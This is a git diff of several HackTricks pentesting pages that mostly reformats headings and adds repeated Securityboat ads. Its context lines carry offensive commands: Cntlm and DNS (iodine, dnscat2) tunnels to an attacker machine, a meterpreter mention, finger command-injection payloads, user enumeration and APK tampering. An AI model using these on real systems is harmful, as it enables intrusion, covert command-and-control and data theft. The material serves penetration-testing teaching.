||||
### Cntlm
|
||||
|
||||
[http://cntlm.sourceforge.net/](http://cntlm.sourceforge.net/)
|
||||
[http://cntlm.sourceforge.net/](http://cntlm.sourceforge.net)
|
||||
|
||||
It authenticates against a proxy and binds a port locally that is forwarded to the external service you specify. Then, you can use the tool of your choice through this port.
|
||||
It authenticates against a proxy and binds a port locally that is forwarded to the external service you specify. Then, you can use the tool of your choice through this port.\
|
||||
Example that forward port 443
|
||||
|
||||
```text
|
||||
```
|
||||
Username Alice
|
||||
Password P@ssw0rd
|
||||
Domain CONTOSO.COM
|
||||
|
@ -296,22 +302,22 @@ Proxy 10.0.0.10:8080
|
|||
Tunnel 2222:<attackers_machine>:443
|
||||
```
|
||||
|
||||
Now, if you set for example in the victim the **SSH** service to listen in port 443. You can connect to it through the attacker port 2222.
|
||||
Now, if you set for example in the victim the **SSH** service to listen in port 443. You can connect to it through the attacker port 2222.\
|
||||
You could also use a **meterpreter** that connects to localhost:443 and the attacker is listening in port 2222.
|
||||
|
||||
# YARP
|
||||
## YARP
|
||||
|
||||
A reverse proxy create by Microsoft. You can find it here: [https://github.com/microsoft/reverse-proxy](https://github.com/microsoft/reverse-proxy)
|
||||
|
||||
# DNS Tunneling
|
||||
## DNS Tunneling
|
||||
|
||||
## Iodine
|
||||
### Iodine
|
||||
|
||||
[https://code.kryo.se/iodine/](https://code.kryo.se/iodine/)
|
||||
|
||||
Root is needed in both systems to create tun adapters and tunnels data between them using DNS queries.
|
||||
|
||||
```text
|
||||
```
|
||||
attacker> iodined -f -c -P P@ssw0rd 1.1.1.1 tunneldomain.com
|
||||
victim> iodine -f -P P@ssw0rd tunneldomain.com -r
|
||||
#You can see the victim at 1.1.1.2
|
||||
|
@ -319,13 +325,13 @@ victim> iodine -f -P P@ssw0rd tunneldomain.com -r
|
|||
|
||||
The tunnel will be really slow. You can create a compressed SSH connection through this tunnel by using:
|
||||
|
||||
```text
|
||||
```
|
||||
ssh <user>@1.1.1.2 -C -c blowfish-cbc,arcfour -o CompressionLevel=9 -D 1080
|
||||
```
|
||||
|
||||
## DNSCat2
|
||||
### DNSCat2
|
||||
|
||||
Establishes a C&C channel through DNS. It doesn't need root privileges.
|
||||
Establishes a C\&C channel through DNS. It doesn't need root privileges.
|
||||
|
||||
```bash
|
||||
attacker> ruby ./dnscat2.rb tunneldomain.com
|
||||
|
@ -339,19 +345,19 @@ session -i <sessions_id>
|
|||
listen [lhost:]lport rhost:rport #Ex: listen 127.0.0.1:8080 10.0.0.20:80, this bind 8080port in attacker host
|
||||
```
|
||||
|
||||
### Change proxychains DNS
|
||||
#### Change proxychains DNS
|
||||
|
||||
Proxychains intercepts `gethostbyname` libc call and tunnels tcp DNS request through the socks proxy. By **default** the **DNS** server that proxychains use is **4.2.2.2** \(hardcoded\). To change it, edit the file: _/usr/lib/proxychains3/proxyresolv_ and change the IP. If you are in a **Windows environment** you could set the IP of the **domain controller**.
|
||||
Proxychains intercepts `gethostbyname` libc call and tunnels tcp DNS request through the socks proxy. By **default** the **DNS** server that proxychains use is **4.2.2.2** (hardcoded). To change it, edit the file: _/usr/lib/proxychains3/proxyresolv_ and change the IP. If you are in a **Windows environment** you could set the IP of the **domain controller**.
|
||||
|
||||
# Tunnels in Go
|
||||
## Tunnels in Go
|
||||
|
||||
[https://github.com/hotnops/gtunnel](https://github.com/hotnops/gtunnel)
|
||||
|
||||
# ICMP Tunneling
|
||||
## ICMP Tunneling
|
||||
|
||||
## Hans
|
||||
### Hans
|
||||
|
||||
[https://github.com/friedrich/hans](https://github.com/friedrich/hans)
|
||||
[https://github.com/friedrich/hans](https://github.com/friedrich/hans)\
|
||||
[https://github.com/albertzak/hanstunnel](https://github.com/albertzak/hanstunnel)
|
||||
|
||||
Root is needed in both systems to create tun adapters and tunnels data between them using ICMP echo requests.
|
||||
|
@ -362,13 +368,18 @@ Root is needed in both systems to create tun adapters and tunnels data between t
|
|||
ping 1.1.1.100 #After a successful connection, the victim will be in the 1.1.1.100
|
||||
```
|
||||
|
||||
# Other tools to check
|
||||
## Other tools to check
|
||||
|
||||
* [https://github.com/securesocketfunneling/ssf](https://github.com/securesocketfunneling/ssf)
|
||||
* [https://github.com/z3APA3A/3proxy](https://github.com/z3APA3A/3proxy)
|
||||
* [https://github.com/jpillora/chisel](https://github.com/jpillora/chisel)
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
|
||||
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
|
||||
|
||||
{% embed url="https://securityboat.in/contact-us" %}
|
||||
{% endhint %}
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -385,5 +396,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
|
||||
# Smali - Decompiling/\[Modifying]/Compiling
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -16,16 +16,24 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
|
||||
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
|
||||
|
||||
{% embed url="https://securityboat.in/contact-us" %}
|
||||
{% endhint %}
|
||||
|
||||
|
||||
|
||||
Sometimes it is interesting to modify the application code to access hidden information for you (maybe well obfuscated passwords or flags). Then, it could be interesting to decompile the apk, modify the code and recompile it.
|
||||
|
||||
**Opcodes reference:** [http://pallergabor.uw.hu/androidblog/dalvik\_opcodes.html](http://pallergabor.uw.hu/androidblog/dalvik\_opcodes.html)
|
||||
|
||||
# Fast Way
|
||||
## Fast Way
|
||||
|
||||
Using **Visual Studio Code** and the [APKLab](https://github.com/APKLab/APKLab) extension, you can **automatically decompile**, modify, **recompile**, sign & install the application without executing any command.
|
||||
|
||||
# Decompile the APK
|
||||
## Decompile the APK
|
||||
|
||||
Using APKTool you can access to the **smali code and resources**:
|
||||
|
||||
|
@ -43,7 +51,7 @@ Some **interesting files you should look are**:
|
|||
|
||||
If `apktool` has **problems decoding the application** take a look to [https://ibotpeaches.github.io/Apktool/documentation/#framework-files](https://ibotpeaches.github.io/Apktool/documentation/#framework-files) or try using the argument **`-r`** (Do not decode resources). Then, if the problem was in a resource and not in the source code, you won't have the problem (you won't also decompile the resources).
|
||||
|
||||
# Change smali code
|
||||
## Change smali code
|
||||
|
||||
You can **change** **instructions**, change the **value** of some variables or **add** new instructions. I change the Smali code using [**VS Code**](https://code.visualstudio.com), you then install the **smalise extension** and the editor will tell you if any **instruction is incorrect**.\
|
||||
Some **examples** can be found here:
|
||||
|
@ -53,7 +61,7 @@ Some **examples** can be found here:
|
|||
|
||||
Or you can [**check below some Smali changes explained**](smali-changes.md#modifying-smali).
|
||||
|
||||
# Recompile the APK
|
||||
## Recompile the APK
|
||||
|
||||
After modifying the code you can **recompile** the code using:
|
||||
|
||||
|
@ -65,7 +73,7 @@ It will **compile** the new APK **inside** the _**dist**_ folder.
|
|||
|
||||
If **apktool** throws an **error**, try[ installing the **latest version**](https://ibotpeaches.github.io/Apktool/install/)
|
||||
|
||||
## **Sing the new APK**
|
||||
### **Sing the new APK**
|
||||
|
||||
Then, you need to **generate a key** (you will be asked for a password and for some information that you can fill randomly):
|
||||
|
||||
|
@ -79,7 +87,7 @@ Finally, **sign** the new APK:
|
|||
jarsigner -keystore key.jks path/to/dist/* <your-alias>
|
||||
```
|
||||
|
||||
## Optimize new application
|
||||
### Optimize new application
|
||||
|
||||
**zipalign** is an archive alignment tool that provides important optimisation to Android application (APK) files. [More information here](https://developer.android.com/studio/command-line/zipalign).
|
||||
|
||||
|
@ -88,15 +96,15 @@ zipalign [-f] [-v] <alignment> infile.apk outfile.apk
|
|||
zipalign -v 4 infile.apk
|
||||
```
|
||||
|
||||
## **Sign the new APK (again?)**
|
||||
### **Sign the new APK (again?)**
|
||||
|
||||
If you **prefer** to use \[**apksigner**]\(**[https://developer.android.com/studio/command-line/apksigner](https://developer.android.com/studio/command-line/apksigner)**)** instead of jarsigner, **you should sing the apk** after applying **the optimization with** zipaling**. BUT NOTICE THAT** YOU ONLY HAVE TO SIGN THE APPLCIATION ONCE** WITH jarsigner (before zipalign) OR WITH aspsigner(after zipaling).
|
||||
If you **prefer** to use \[**apksigner**]\([**https://developer.android.com/studio/command-line/apksigner**](https://developer.android.com/studio/command-line/apksigner))\*\* instead of jarsigner, **you should sing the apk** after applying **the optimization with** zipaling\*\*. BUT NOTICE THAT\*\* YOU ONLY HAVE TO SIGN THE APPLCIATION ONCE\*\* WITH jarsigner (before zipalign) OR WITH aspsigner(after zipaling).
|
||||
|
||||
```bash
|
||||
apksigner sign --ks key.jks ./dist/mycompiled.apk
|
||||
```
|
||||
|
||||
# Modifying Smali
|
||||
## Modifying Smali
|
||||
|
||||
For the following Hello World Java code:
|
||||
|
||||
|
@ -120,9 +128,9 @@ The Smali code would be:
|
|||
|
||||
The Smali instruction set is available [here](https://source.android.com/devices/tech/dalvik/dalvik-bytecode#instructions).
|
||||
|
||||
## Light Changes
|
||||
### Light Changes
|
||||
|
||||
## Modify initial values of a variable inside a function
|
||||
### Modify initial values of a variable inside a function
|
||||
|
||||
Some variables are defined at the beginning of the function using the opcode _const_, you can modify its values, or you can define new ones:
|
||||
|
||||
|
@ -134,7 +142,7 @@ const/4 v8, 0x1
|
|||
const-string v5, "wins"
|
||||
```
|
||||
|
||||
## Basic Operations
|
||||
### Basic Operations
|
||||
|
||||
```
|
||||
#Math
|
||||
|
@ -159,9 +167,9 @@ if-ne v0, v9, :goto_6 #If not equals, go to: :goto_6
|
|||
goto :goto_6 #Always go to: :goto_6
|
||||
```
|
||||
|
||||
## Bigger Changes
|
||||
### Bigger Changes
|
||||
|
||||
## Logging
|
||||
### Logging
|
||||
|
||||
```
|
||||
#Log win: <number>
|
||||
|
@ -180,7 +188,7 @@ Recommendations:
|
|||
* The new variables should be the next numbers of the already declared variables (in this example should be _v10_ and _v11_, remember that it starts in v0).
|
||||
* Change the code of the logging function and use _v10_ and _v11_ instead of _v5_ and _v1_.
|
||||
|
||||
## Toasting
|
||||
### Toasting
|
||||
|
||||
Remember to add 3 to the number of _.locals_ at the begging of the function.
|
||||
|
||||
|
@ -198,6 +206,12 @@ move-result-object v12
|
|||
invoke-virtual {v12}, Landroid/widget/Toast;->show()V
|
||||
```
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
|
||||
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
|
||||
|
||||
{% embed url="https://securityboat.in/contact-us" %}
|
||||
{% endhint %}
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -214,5 +228,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
|
||||
# 113 - Pentesting Ident
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -16,10 +16,16 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
|
||||
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
|
||||
|
||||
# Basic Information
|
||||
{% embed url="https://securityboat.in/contact-us" %}
|
||||
{% endhint %}
|
||||
|
||||
Is an [Internet](https://en.wikipedia.org/wiki/Internet) [protocol](https://en.wikipedia.org/wiki/Protocol_\(computing\)) that helps identify the user of a particular [TCP](https://en.wikipedia.org/wiki/Transmission_Control_Protocol) connection.
|
||||
## Basic Information
|
||||
|
||||
Is an [Internet](https://en.wikipedia.org/wiki/Internet) [protocol](https://en.wikipedia.org/wiki/Protocol\_\(computing\)) that helps identify the user of a particular [TCP](https://en.wikipedia.org/wiki/Transmission\_Control\_Protocol) connection.
|
||||
|
||||
**Default port:** 113
|
||||
|
||||
|
@ -28,9 +34,9 @@ PORT STATE SERVICE
|
|||
113/tcp open ident
|
||||
```
|
||||
|
||||
# **Enumeration**
|
||||
## **Enumeration**
|
||||
|
||||
## **Manual - Get user/Identify the service**
|
||||
### **Manual - Get user/Identify the service**
|
||||
|
||||
If a machine is running the service ident and samba (445) and you are connected to samba using the port 43218. You can get which user is running the samba service by doing:
|
||||
|
||||
|
@ -44,7 +50,7 @@ Other errors:
|
|||
|
||||
![](<../.gitbook/assets/image (17).png>)
|
||||
|
||||
## Nmap
|
||||
### Nmap
|
||||
|
||||
By default (-sC) nmap will identify every user of every running port:
|
||||
|
||||
|
@ -63,7 +69,7 @@ PORT STATE SERVICE VERSION
|
|||
|_auth-owners: root
|
||||
```
|
||||
|
||||
## Ident-user-enum
|
||||
### Ident-user-enum
|
||||
|
||||
Ident-user-enum is a simple PERL script to query the ident service (113/TCP) in order to determine the owner of the process listening on each TCP port of a target system. The list of usernames gathered can be used for password guessing attacks on other network services. It can be installed with `apt install ident-user-enum`.
|
||||
|
||||
|
@ -77,15 +83,15 @@ ident-user-enum v1.0 ( http://pentestmonkey.net/tools/ident-user-enum )
|
|||
192.168.1.100:445 root
|
||||
```
|
||||
|
||||
## Shodan
|
||||
### Shodan
|
||||
|
||||
* `oident`
|
||||
|
||||
# Files
|
||||
## Files
|
||||
|
||||
identd.conf
|
||||
|
||||
# HackTricks Automatic Commands
|
||||
## HackTricks Automatic Commands
|
||||
|
||||
```
|
||||
Protocol_Name: Ident #Protocol Abbreviation if there is one.
|
||||
|
@ -106,6 +112,12 @@ Entry_2:
|
|||
Note: apt install ident-user-enum ident-user-enum {IP} 22 23 139 445 (try all open ports)
|
||||
```
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
|
||||
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
|
||||
|
||||
{% embed url="https://securityboat.in/contact-us" %}
|
||||
{% endhint %}
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -122,5 +134,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
@ -16,6 +16,13 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
|
||||
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
|
||||
|
||||
{% embed url="https://securityboat.in/contact-us" %}
|
||||
{% endhint %}
|
||||
|
||||
## Docker Basics
|
||||
|
||||
### What is
|
||||
|
@ -349,6 +356,13 @@ falco-probe found and loaded in dkms
|
|||
|
||||
You can use auditd to monitor docker.
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
|
||||
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
|
||||
|
||||
{% embed url="https://securityboat.in/contact-us" %}
|
||||
{% endhint %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
|
|
@ -16,6 +16,13 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
|
||||
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
|
||||
|
||||
{% embed url="https://securityboat.in/contact-us" %}
|
||||
{% endhint %}
|
||||
|
||||
## Basic Information
|
||||
|
||||
Multicast DNS (mDNS) is a **zero-configuration protocol** that lets you perform **DNS-like operations** on the local network in the absence of a conventional, unicast DNS server. The protocol uses the **same** API, **packet formats**, and operating semantics as DNS, allowing you to resolve domain names on the local network. **DNS Service Discovery (DNS-SD)** is a protocol that allows clients to **discover a list of named instances of services** (such as test.\_ipps.\_tcp.local, or linux.\_ssh.\_tcp.local) in a domain using standard DNS queries. DNS-SD is most often used in conjunction with mDNS but isn’t dependent on it. They’re both used by many IoT devices, such as network printers, Apple TVs, Google Chromecast, Network-Attached Storage (NAS) devices, and cameras.\
|
||||
|
@ -106,6 +113,13 @@ For more information check:
|
|||
|
||||
* [Practical IoT Hacking: The Definitive Guide to Attacking the Internet of Things](https://books.google.co.uk/books/about/Practical\_IoT\_Hacking.html?id=GbYEEAAAQBAJ\&redir\_esc=y)
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
|
||||
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
|
||||
|
||||
{% embed url="https://securityboat.in/contact-us" %}
|
||||
{% endhint %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
|
|
@ -16,6 +16,13 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
|
||||
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
|
||||
|
||||
{% embed url="https://securityboat.in/contact-us" %}
|
||||
{% endhint %}
|
||||
|
||||
## Basic Information
|
||||
|
||||
> The **Real Time Streaming Protocol** (**RTSP**) is a network control protocol designed for use in entertainment and communications systems to control streaming media servers. The protocol is used for establishing and controlling media sessions between end points. Clients of media servers issue VHS-style commands, such as play, record and pause, to facilitate real-time control of the media streaming from the server to a client (Video On Demand) or from a client to the server (Voice Recording).
|
||||
|
@ -98,8 +105,14 @@ Cameradar allows you to:
|
|||
* Generate thumbnails from them to check if the streams are valid and to have a quick preview of their content
|
||||
* Try to create a Gstreamer pipeline to check if they are properly encoded
|
||||
* Print a summary of all the informations Cameradar could get
|
||||
* [https://github.com/Ullaakut/cameradar](https://github.com/Ullaakut/cameradar)
|
||||
|
||||
[https://github.com/Ullaakut/cameradar](https://github.com/Ullaakut/cameradar)
|
||||
{% hint style="danger" %}
|
||||
<img src="../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
|
||||
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
|
||||
|
||||
{% embed url="https://securityboat.in/contact-us" %}
|
||||
{% endhint %}
|
||||
|
||||
<details>
|
||||
|
||||
|
|
|
@ -16,6 +16,13 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
|
||||
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
|
||||
|
||||
{% embed url="https://securityboat.in/contact-us" %}
|
||||
{% endhint %}
|
||||
|
||||
## **Basic Information**
|
||||
|
||||
> **rsync** is a utility for efficiently [transferring](https://en.wikipedia.org/wiki/File\_transfer) and [synchronizing](https://en.wikipedia.org/wiki/File\_synchronization) [files](https://en.wikipedia.org/wiki/Computer\_file) between a computer and an external hard drive and across [networked](https://en.wikipedia.org/wiki/Computer\_network) [computers](https://en.wikipedia.org/wiki/Computer) by comparing the [modification times](https://en.wikipedia.org/wiki/Timestamping\_\(computing\))and sizes of files.[\[3\]](https://en.wikipedia.org/wiki/Rsync#cite\_note-man\_page-3) It is commonly found on [Unix-like](https://en.wikipedia.org/wiki/Unix-like) [operating systems](https://en.wikipedia.org/wiki/Operating\_system). The rsync algorithm is a type of [delta encoding](https://en.wikipedia.org/wiki/Delta\_encoding), and is used for minimizing network usage. [Zlib](https://en.wikipedia.org/wiki/Zlib) may be used for additional [data compression](https://en.wikipedia.org/wiki/Data\_compression),[\[3\]](https://en.wikipedia.org/wiki/Rsync#cite\_note-man\_page-3) and [SSH](https://en.wikipedia.org/wiki/Secure\_Shell) or [stunnel](https://en.wikipedia.org/wiki/Stunnel) can be used for security.
|
||||
|
@ -111,6 +118,13 @@ find /etc \( -name rsyncd.conf -o -name rsyncd.secrets \)
|
|||
|
||||
Inside the config file sometimes you could find the parameter _secrets file = /path/to/file_ and this file could contains usernames and passwords allowed to authenticate to rsyncd.
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
|
||||
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
|
||||
|
||||
{% embed url="https://securityboat.in/contact-us" %}
|
||||
{% endhint %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
|
||||
# 79 - Pentesting Finger
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -16,28 +16,34 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
|
||||
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
|
||||
|
||||
# **Basic Info**
|
||||
{% embed url="https://securityboat.in/contact-us" %}
|
||||
{% endhint %}
|
||||
|
||||
**Finger** is a program you can use to find information about computer users. It usually lists the login name, the full name, and possibly other details about the user you are fingering. These details may include the office location and phone number \(if known\), login time, idle time, time mail was last read, and the user's plan and project files.
|
||||
## **Basic Info**
|
||||
|
||||
**Finger** is a program you can use to find information about computer users. It usually lists the login name, the full name, and possibly other details about the user you are fingering. These details may include the office location and phone number (if known), login time, idle time, time mail was last read, and the user's plan and project files.
|
||||
|
||||
**Default port:** 79
|
||||
|
||||
```text
|
||||
```
|
||||
PORT STATE SERVICE
|
||||
79/tcp open finger
|
||||
```
|
||||
|
||||
# **Enumeration**
|
||||
## **Enumeration**
|
||||
|
||||
## **Banner Grabbing/Basic connection**
|
||||
### **Banner Grabbing/Basic connection**
|
||||
|
||||
```bash
|
||||
nc -vn <IP> 79
|
||||
echo "root" | nc -vn <IP> 79
|
||||
```
|
||||
|
||||
## **User enumeration**
|
||||
### **User enumeration**
|
||||
|
||||
```bash
|
||||
finger @<Victim> #List users
|
||||
|
@ -53,35 +59,40 @@ finger-user-enum.pl -u root -t 10.0.0.1
|
|||
finger-user-enum.pl -U users.txt -T ips.txt
|
||||
```
|
||||
|
||||
### **Nmap execute a script for doing using default scripts**
|
||||
#### **Nmap execute a script for doing using default scripts**
|
||||
|
||||
## Metasploit uses more tricks than Nmap
|
||||
### Metasploit uses more tricks than Nmap
|
||||
|
||||
```text
|
||||
```
|
||||
use auxiliary/scanner/finger/finger_users
|
||||
```
|
||||
|
||||
## Shodan
|
||||
### Shodan
|
||||
|
||||
* `port:79 USER`
|
||||
|
||||
# Command execution
|
||||
## Command execution
|
||||
|
||||
```bash
|
||||
finger "|/bin/id@example.com"
|
||||
finger "|/bin/ls -a /@example.com"
|
||||
```
|
||||
|
||||
# Finger Bounce
|
||||
## Finger Bounce
|
||||
|
||||
[Use a system as a finger relay](https://securiteam.com/exploits/2BUQ2RFQ0I/)
|
||||
|
||||
```text
|
||||
```
|
||||
finger user@host@victim
|
||||
finger @internal@external
|
||||
```
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
|
||||
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
|
||||
|
||||
{% embed url="https://securityboat.in/contact-us" %}
|
||||
{% endhint %}
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -98,5 +109,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
|
||||
# 111/TCP/UDP - Pentesting Portmapper
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -16,8 +16,14 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
|
||||
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
|
||||
|
||||
# Basic Information
|
||||
{% embed url="https://securityboat.in/contact-us" %}
|
||||
{% endhint %}
|
||||
|
||||
## Basic Information
|
||||
|
||||
Provides information between Unix based systems. Port is often probed, it can be used to fingerprint the Nix OS, and to obtain information about available services. Port used with NFS, NIS, or any rpc-based service.
|
||||
|
||||
|
@ -28,7 +34,7 @@ PORT STATE SERVICE
|
|||
111/tcp open rpcbind
|
||||
```
|
||||
|
||||
# Enumeration
|
||||
## Enumeration
|
||||
|
||||
```
|
||||
rpcinfo irked.htb
|
||||
|
@ -39,11 +45,11 @@ Sometimes it doesn't give you any information, in other occasions you will get s
|
|||
|
||||
![](<../.gitbook/assets/image (230).png>)
|
||||
|
||||
## Shodan
|
||||
### Shodan
|
||||
|
||||
* `port:111 portmap`
|
||||
|
||||
# RPCBind + NFS
|
||||
## RPCBind + NFS
|
||||
|
||||
If you find the service NFS then probably you will be able to list and download(and maybe upload) files:
|
||||
|
||||
|
@ -51,7 +57,7 @@ If you find the service NFS then probably you will be able to list and download(
|
|||
|
||||
Read[ 2049 - Pentesting NFS service](nfs-service-pentesting.md) to learn more about how to test this protocol.
|
||||
|
||||
# NIS
|
||||
## NIS
|
||||
|
||||
If you find the service `ypbind`running:
|
||||
|
||||
|
@ -81,7 +87,7 @@ yumi:ZEadZ3ZaW4v9.:1377:160::/export/home/yumi:/bin/bash
|
|||
| /etc/group | group.byname, group.bygid | NIS group file |
|
||||
| /usr/lib/aliases | mail.aliases | Details mail aliases |
|
||||
|
||||
# RPC Users
|
||||
## RPC Users
|
||||
|
||||
If you find the **rusersd** service listed like this:
|
||||
|
||||
|
@ -89,17 +95,17 @@ If you find the **rusersd** service listed like this:
|
|||
|
||||
You could enumerate users of the box. To learn how read [1026 - Pentesting Rsusersd](1026-pentesting-rusersd.md).
|
||||
|
||||
# Bypass Filtered Portmapper port
|
||||
## Bypass Filtered Portmapper port
|
||||
|
||||
If during a nmap scan you see open ports like NFS but the port 111 is filtered, you won't be able to exploit those ports.\
|
||||
But, if you can simulate a locally a portmapper service and you tunnel the NFS port from your machine to the victim one, you will be able to use regular tools to exploit those services.\
|
||||
More information in [https://medium.com/@sebnemK/how-to-bypass-filtered-portmapper-port-111-27cee52416bc](https://medium.com/@sebnemK/how-to-bypass-filtered-portmapper-port-111-27cee52416bc)
|
||||
|
||||
# Shodan
|
||||
## Shodan
|
||||
|
||||
* `Portmap`
|
||||
|
||||
# HackTricks Automatic Commands
|
||||
## HackTricks Automatic Commands
|
||||
|
||||
```
|
||||
Protocol_Name: Portmapper #Protocol Abbreviation if there is one.
|
||||
|
@ -125,6 +131,12 @@ Entry_3:
|
|||
Command: nmap -sSUC -p 111 {IP}
|
||||
```
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
|
||||
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
|
||||
|
||||
{% embed url="https://securityboat.in/contact-us" %}
|
||||
{% endhint %}
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -141,5 +153,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
@ -16,6 +16,13 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
